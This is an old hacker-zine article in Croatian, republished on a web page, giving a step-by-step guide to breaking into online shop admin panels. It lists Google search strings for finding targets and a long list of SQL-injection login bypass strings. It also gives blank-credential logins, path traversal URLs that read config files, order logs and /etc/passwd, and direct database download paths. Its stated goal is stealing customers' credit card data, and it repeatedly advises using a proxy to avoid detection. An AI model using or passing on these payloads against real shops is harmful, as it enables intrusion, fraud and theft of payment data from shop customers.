1x09 Exploiting ShopAdmin

Published in

· 9 months ago

 
                            ................... 
                      ...::: phearless zine #1 :::... 
                   
.....................>---[ Exploiting ShopAdmin ]---<....................... 

...........................>---[ by Re00t ]---<............................. 
                                                    Re00t[at]ii-labs[dot]org 

SADRZAJ: 

    [0]  Uvod 
    [1]  ASP ShopAdmini 
    [2]  Alabanza AlaCar 
    [3]  CommerceSQL 
    [4]  Meta Cart 
    [5]  shop.pl 
    [6]  Windows ShopAdmini 
    [7]  The End 

 

//////////////////////////////////////////////////////////////////////////// 
--==<[ 0. Uvod 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 

    Evo ja sam takodjer odlucio napisat neki tekst za eZine... odlucio sam  
pisati o ranjivostima raznih shopova, prikupljanju cc-a i sve sto se tice  
shopadmina, posto nisam vidio niti jedan domaci tekst o tome ! Ako trebate  
bilo kakvu pomoc mozete me kontaktirati na moj e-mail ( Re00t@ii-labs.org )  
ili irc.krstarica.org #HackGen !!! 

 

//////////////////////////////////////////////////////////////////////////// 
--==<[ 1. ASP ShopAdmini 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 

    Znaci morate traziti u google-u shop.asp -> To je najcesci ali takodjer  
mozete traziti i ove: 

shopadmin1.asp 
adminindex.html 
shopadmin1.asp 
shopa_displayorders.asp?page=2 
shopa_displayorders.asp 
shopa.asp 
displayorders.asp 
admin.asp 
orders.asp 
vieworders.asp 
view_orders.asp 

    Kada nadjete shopadmin, naravno morate prvo naci one ranjive... onda  
koristite sljedece kodove za upadanje u njih: 

'or'1 
'or''=' 
'=' 
Admin 
admin'--  
' or 0=0 --  
" or 0=0 --  
or 0=0 --  
' or 0=0 #  
" or 0=0 #  
or 0=0 #  
' or 'x'='x  
" or "x"="x  
') or ('x'='x  
' or 1=1--  
" or 1=1--  
or 1=1--  
' or a=a--  
" or "a"="a  
') or ('a'='a  
") or ("a"="a  
hi" or "a"="a  
hi" or 1=1 --  
hi' or 1=1 --  
hi' or 'a'='a  
hi') or ('a'='a  
hi") or ("a"="a  

Te kodove kopirajte i staviti isti kod u username i password... ako je shop  
ranjiv,  trebali bi dobiti pristup narudzbama, logovima i ostalom... 

*** KORISTITE PROXY *** 

 

//////////////////////////////////////////////////////////////////////////// 
--==<[ 2. Alabanza AlaCar 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 

    Ok ovo je lagano exploitati, trazite u google: 

s-cart/admin 

    Kada ga nadjete, ulogirajte se sa: 

Username: = 
Password: = 

*** KORISTITE PROXY *** 

 

//////////////////////////////////////////////////////////////////////////// 
--==<[ 3. CommerceSQL 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 

    CommerceSQL explotajte na sljedeci nacin kada nadjete CommerceSQL SHOP ! 
Kucajte ove urlove: 

Primjer: 

http://www.domena.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl 

http://www.domena.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi 

http://www.domena.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log 

Ili ako hocete preko google-a 

admin/files/order.log 

*** KORISTITE PROXY *** 

 

//////////////////////////////////////////////////////////////////////////// 
--==<[ 4. Meta Cart 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 

    Meta Cart je free shop znaci ne naplacuje se a kako ga exploitati ... :) 
Jednostavno... 

http://www.domena.com/database/metacart.mdb 
http://www.domena.com/metacart/database/metacart.mdb 

*** KORISTITE PROXY *** 

 

//////////////////////////////////////////////////////////////////////////// 
--==<[ 5. shop.pl 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 

    Nije bas jako popularan ali naci cete ga preko google-a. Znaci otkucajte 
shop.pl u google-u. 

A exploitati ga ovako... 

http://www.domena.com/cgi-local/shop.pl/page=shop.cfg is where the config file  
is located. 

http://www.domena.com/cgi-local/shop.pl/page=../../../../../../../../../../../../../../etc/passwd 

http://www.domena.com/cgi-local/shop.pl/page=./product_list 

*** KORISTITE PROXY *** 

 

//////////////////////////////////////////////////////////////////////////// 
--==<[ 6. Windows shopadmini 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 

    Ovi su totalno lame... sve ide preko testa baze :) Trazite preko googla  
linkove koji se zavrsavaju sa: 

    shopdisplaycategories.asp 

Kada ga nadjete, umjesto shopdisplaycategories.asp stavite ovo: 

    shopdbtest.asp 

I onda pogledajte sto pise pod xDatabase: shopping and xDblocation:\shop_db 
i sada dodajte na Domenu: 

    /shop_db/shopping.mdb  

ili gdje se nalazi shop i skinete bazu s CCima i narudzbama :-) !!! 

*** KORISTITE PROXY *** 

 

//////////////////////////////////////////////////////////////////////////// 
--==<[ 7. The End 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 

Evo pozdravljam sve sa #ugs, #hackgen, #secure, #office na irc.krstarica.org 
Sve s HackGen-a, II-labs-a ...

1x09 Exploiting ShopAdmin

Share this article

Let's discover also

3x08 xtreem Exploiting Steps

1x10 CGI Exploiting

3x09 Exploiting Non-exec Stack

3x10 Exploiting Stack BOF over SEH

1- Exploiting x86 stack based buffer overflows

7 - Further advances in to exploiting vulnerable format string bugs

4 - Bypassing non-executable-stack during exploitation using return-to-libc

9 - Windows Heap Overflows using the Process Environment Block (PEB)

Phrack Inc. Volume 11 Issue 64 File 06

HOMEBREW Digest #4240

Recent Articles

The extraterrestrial hypothesis

2.3: CD-ROM Optimizations

2.2: Reading a file from CD-ROM

2.1: About the CD-ROM

2.1. The Principles of PlayStation 3D

1.6: Using the CD-ROM

1.5: Fixed Point Math

1.4: Controllers

1.3: Textures, TPages and CLUTs

The Longevity of the Biblical Patriarchs

Recent Comments